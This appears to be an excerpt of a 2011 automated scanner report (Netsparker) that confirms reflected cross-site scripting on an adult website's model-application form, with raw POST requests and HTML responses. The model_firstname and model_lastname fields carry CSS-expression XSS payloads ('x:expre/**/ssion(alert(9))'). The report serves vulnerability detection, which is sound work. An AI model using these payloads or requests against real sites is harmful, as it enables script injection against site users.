<input type="checkbox" id="available_6" name="available_6" value="1" checked="checked"><label for="available_6">DP</label>
</div>
<div id="model_pics" style="border:1px solid red;">
<label for="pic1">Pic #1:</label><input type="file" id="pic1" name="pic1"><br />
<label for="pic2">Pic #2:</label><input type="file" id="pic2" name="pic2"><br />
<label for="pic3">Pic #3:</label><input type="file" id="pic3" name="pic3"><br />
<label for="pic4">Pic #4:</label><input type="file" id="pic4" name="pic4">
</div>
<p id="model_note"><b>Note:</b> Applications submitted by men will be disregarded and you will not receive a response.</p>
<input type="submit" id="model_submit" value="Submit form">
</form>
</div> </div><!--closes section_wrapper--> <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script> <script type="text/javascript"> var bodyHeight = parseInt($j("body").css("height")); var boxThWidth = parseInt($j("#boxThSel").css("width")); var windowWidth, boxFade, marginValue; function fadeObject (elementFade , value) { $j(elementFade).animate({ opacity: value }, 1000 ); } function ignoreCloseThAlert(cookieName) { setCookie(cookieName, 1); fadeOut('#boxThSel' , 0); fadeOut('#bkg-container' , 0); $j("#boxThSel").css("display" , "none"); $j("#bkg-container").css("display" , "none"); } function fadeOut(boxToFade , numberValue) { fadeObject (boxToFade , numberValue); return false; } function positionBox(marginValue) { if($j(window).width() > 965 ){ windowWidth = $j(window).width(); //$j("#boxThSel").css("left", (windowWidth /2 ) - (boxThWidth - marginValue) + "px"); } } $j(document).ready(function (){ $j("#bkg-container").css("height" , bodyHeight + "px"); }); try { var pageTracker = _gat._getTracker("UA-2623535-1"); pageTracker._setDomainName(".pornhub.com"); pageTracker._setAllowHash(false); pageTracker._setSampleRate("10"); pageTracker._trackPageview(); pageTracker._trackPageLoadTime(); } catch(err) {} </script> <div style="clear:both;"> <p class="footer"> The PornHub team is always updating and adding more porn videos every day. It's all here and 100% free porn. We have a huge free DVD selection that you can download or stream. PornHub is the most complete and revolutionary porn tube site. We offer streaming porn videos, downloadable DVDs, photo albums, and the number 1 free sex community on the net. We&rsquo;re always working towards adding more features that will keep your porno addiction alive and well. Send us feedback if you have any questions/comments. 
</p> <p class="footer"> Pornhub.com, 2011 &middot; <a href="/information#faq" rel="nofollow">FAQ</a> &middot; <a href="/information#terms" rel="nofollow">terms and conditions</a> &middot; <a href="/information#privacy" rel="nofollow">privacy policy</a> &middot; <a href="/information#dmca" rel="nofollow">DMCA</a> &middot; <a href="/information..
- /model

/model CONFIRMED

http://www.pornhub.com/model

Parameters

Parameter Type Value
available_1 POST 1
available_2 POST 1
available_3 POST 1
available_4 POST 1
available_5 POST 1
available_6 POST 1
model_city POST 3
model_email POST netsparker@example.com
model_firstname POST " stYle="x:expre/**/ssion(alert(9))
model_gender POST female
model_lastname POST Smith
model_moreinfo POST 3
model_phone POST 3
pic1 POST 3
pic2 POST 3
pic3 POST 3
pic4 POST 3

Request

POST /model HTTP/1.1
Referer: http://www.pornhub.com/model
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=5b5bd18e8c22435383811bdc6f8a8149
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Content-Length: 1671
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_1"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_2"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_3"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_4"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_5"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_6"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_city"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_email"

netsparker@example.com
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_firstname"

" stYle="x:expre/**/ssion(netsparker(9))
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_gender"

female
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_lastname"

Smith
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_moreinfo"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_phone"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="pic1"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="pic2"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="pic3"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="pic4"

3
--5b5bd18e8c22435383811bdc6f8a8149--

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:14:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4934
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Become a Pornstar Model</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 
'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" 
style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/model" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 
'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/model" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> 
<li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div id="model_container">
<p id="model_title">Pornhub Advertising</p>
<p id="model_description">
If your an aspiring young female model and have ever thought of starting a career in the adult industry, well look no further!
Here's the first step you need to take in order to make your dream become a reality. Fill out the form below and you will be contacted by us if you have what it takes.
</p>
<p id="model_error">Your submition contains some errors. Please correct them and try again.</p> <form id="model_form" method="post" enctype="multipart/form-data">
<ul id="model_application">
<li>Must be 18 years of age or older</li>
<li>Willing to travel</li>
<li>We require nude pictures (front, back, face)</li>
<li>We pay all travel expenses, lodging and food</li>
<li>Must be open to participate in adult oriented content</li>
</ul>
<div id="model_information">
<label for="model_firstname">First name:</label><input type="text" id="model_firstname" name="model_firstname" value="" stYle="x:expre/**/ssion(netsparker(9)) "><br />
<label for="model_lastname">Last name:</label><input type="text" id="model_lastname" name="model_lastname" value="Smith"><br />
<label for="model_phone">Phone number:</label><input type="text" id="model_phone" name="model_phone" value="3"><br />
<label for="model_phone">City, Country:</label><input type="text" id="model_city" name="model_city" value="3"><br />
<label for="model_email">E-mail:</label><input type="text" id="model_email" name="model_email" value="netsparker@example.com"><br />
<label for="model_gender">Gender:</label><select id="model_gender" name="model_gender"><option selected="selected" value="female">Female</option></select>
</div>
<textarea id="model_moreinfo" name="model_moreinfo">3</textarea>
<div id="model_available">
<input type="checkbox" id="available_1" name="available_1" value="1" checked="checked"><label for="available_1">Anal</label><br />
<input type="checkbox" id="available_2" name="available_2" value="1" checked="checked"><label for="available_2">Boy / Girl</label><br />
<input type="checkbox" id="available_3" name="available_3" value="1" checked="checked"><label for="available_3">Girl / Girl</label><br />
<input type="checkbox" id="available_4" name="available_4" value="1" checked="checked"><label for="available_4">Boy / Boy / Girl</label><br />
<input type="checkbox" id="available_5" name="available_5" value="1" checked="checked"><label for="available_5">Boy / Girl / Girl</label><br />
<input type="checkbox" id="available_6" name="available_6" value="1" checked="checked"><label for="available_6">DP</label>
</div>
<div id="model_pics" style="border:1px solid red;">
<label for="pic1">Pic #1:</label><input type="file" id="pic1" name="pic1"><br />
<label for="pic2">Pic #2:</label><input type="file" id="pic2" name="pic2"><br />
<label for="pic3">Pic #3:</label><input type="file" id="pic3" name="pic3"><br />
<label for="pic4">Pic #4:</label><input type="file" id="pic4" name="pic4">
</div>
<p id="model_note"><b>Note:</b> Applications submitted by men will be disregarded and you will not receive a response.</p>
<input type="submit" id="model_submit" value="Submit form">
</form>
</div> </div><!--closes section_wrapper--> <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script> <script type="text/javascript"> var bodyHeight = parseInt($j("body").css("height")); var boxThWidth = parseInt($j("#boxThSel").css("width")); var windowWidth, boxFade, marginValue; function fadeObject (elementFade , value) { $j(elementFade).animate({ opacity: value }, 1000 ); } function ignoreCloseThAlert(cookieName) { setCookie(cookieName, 1); fadeOut('#boxThSel' , 0); fadeOut('#bkg-container' , 0); $j("#boxThSel").css("display" , "none"); $j("#bkg-container").css("display" , "none"); } function fadeOut(boxToFade , numberValue) { fadeObject (boxToFade , numberValue); return false; } function positionBox(marginValue) { if($j(window).width() > 965 ){ windowWidth = $j(window).width(); //$j("#boxThSel").css("left", (windowWidth /2 ) - (boxThWidth - marginValue) + "px"); } } $j(document).ready(function (){ $j("#bkg-container").css("height" , bodyHeight + "px"); }); try { var pageTracker = _gat._getTracker("UA-2623535-1"); pageTracker._setDomainName(".pornhub.com"); pageTracker._setAllowHash(false); pageTracker._setSampleRate("10"); pageTracker._trackPageview(); pageTracker._trackPageLoadTime(); } catch(err) {} </script> <div style="clear:both;"> <p class="footer"> The PornHub team is always updating and adding more porn videos every day. It's all here and 100% free porn. We have a huge free DVD selection that you can download or stream. PornHub is the most complete and revolutionary porn tube site. We offer streaming porn videos, downloadable DVDs, photo albums, and the number 1 free sex community on the net. We&rsquo;re always working towards adding more features that will keep your porno addiction alive and well. Send us feedback if you have any questions/comments. 
</p> <p class="footer"> Pornhub.com, 2011 &middot; <a href="/information#faq" rel="nofollow">FAQ</a> &middot; <a href="/information#terms" rel="nofollow">terms and conditions</a> &middot; <a href="/information#privacy" rel="nofollow">privacy policy</a> &middot; <a href="/information#dmca" rel="nofollow">DMCA</a> &middot; <a href="/information#btn-2257" rel=&qu..
- /model

/model CONFIRMED

http://www.pornhub.com/model

Parameters

Parameter Type Value
available_1 POST 1
available_2 POST 1
available_3 POST 1
available_4 POST 1
available_5 POST 1
available_6 POST 1
model_city POST 3
model_email POST netsparker@example.com
model_firstname POST Smith
model_gender POST female
model_lastname POST " stYle="x:expre/**/ssion(alert(9))
model_moreinfo POST 3
model_phone POST 3
pic1 POST 3
pic2 POST 3
pic3 POST 3
pic4 POST 3

Request

POST /model HTTP/1.1
Referer: http://www.pornhub.com/model
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=2fc2828184a34dea961421e5135dac47
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Content-Length: 1671
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_1"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_2"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_3"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_4"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_5"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_6"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_city"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_email"

netsparker@example.com
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_firstname"

Smith
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_gender"

female
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_lastname"

" stYle="x:expre/**/ssion(netsparker(9))
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_moreinfo"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_phone"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="pic1"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="pic2"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="pic3"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="pic4"

3
--2fc2828184a34dea961421e5135dac47--

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:14:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4933
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Become a Pornstar Model</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 
'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" 
style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/model" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 
'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/model" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> 
<li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div id="model_container">
<p id="model_title">Pornhub Advertising</p>
<p id="model_description">
If your an aspiring young female model and have ever thought of starting a career in the adult industry, well look no further!
Here's the first step you need to take in order to make your dream become a reality. Fill out the form below and you will be contacted by us if you have what it takes.
</p>
<p id="model_error">Your submition contains some errors. Please correct them and try again.</p> <form id="model_form" method="post" enctype="multipart/form-data">
<ul id="model_application">
<li>Must be 18 years of age or older</li>
<li>Willing to travel</li>
<li>We require nude pictures (front, back, face)</li>
<li>We pay all travel expenses, lodging and food</li>
<li>Must be open to participate in adult oriented content</li>
</ul>
<div id="model_information">
<label for="model_firstname">First name:</label><input type="text" id="model_firstname" name="model_firstname" value="Smith"><br />
<label for="model_lastname">Last name:</label><input type="text" id="model_lastname" name="model_lastname" value="" stYle="x:expre/**/ssion(netsparker(9)) "><br />
<label for="model_phone">Phone number:</label><input type="text" id="model_phone" name="model_phone" value="3"><br />
<label for="model_phone">City, Country:</label><input type="text" id="model_city" name="model_city" value="3"><br />
<label for="model_email">E-mail:</label><input type="text" id="model_email" name="model_email" value="netsparker@example.com"><br />
<label for="model_gender">Gender:</label><select id="model_gender" name="model_gender"><option selected="selected" value="female">Female</option></select>
</div>
<textarea id="model_moreinfo" name="model_moreinfo">3</textarea>
<div id="model_available">
<input type="checkbox" id="available_1" name="available_1" value="1" checked="checked"><label for="available_1">Anal</label><br />
<input type="checkbox" id="available_2" name="available_2" value="1" checked="checked"><label for="available_2">Boy / Girl</label><br />
<input type="checkbox" id="available_3" name="available_3" value="1" checked="checked"><label for="available_3">Girl / Girl</label><br />
<input type="checkbox" id="available_4" name="available_4" value="1" checked="checked"><label for="available_4">Boy / Boy / Girl</label><br />
<input type="checkbox" id="available_5" name="available_5" value="1" checked="checked"><label for="available_5">Boy / Girl / Girl</label><br />
<input type="checkbox" id="available_6" name="available_6" value="1" checked="checked"><label for="available_6">DP</label>
</div>
<div id="model_pics" style="border:1px solid red;">
<label for="pic1">Pic #1:</label><input type="file" id="pic1" name="pic1"><br />
<label for="pic2">Pic #2:</label><input type="file" id="pic2" name="pic2"><br />
<label for="pic3">Pic #3:</label><input type="file" id="pic3" name="pic3"><br />
<label for="pic4">Pic #4:</label><input type="file" id="pic4" name="pic4">
</div>
<p id="model_note"><b>Note:</b> Applications submitted by men will be disregarded and you will not receive a response.</p>
<input type="submit" id="model_submit" value="Submit form">
</form>
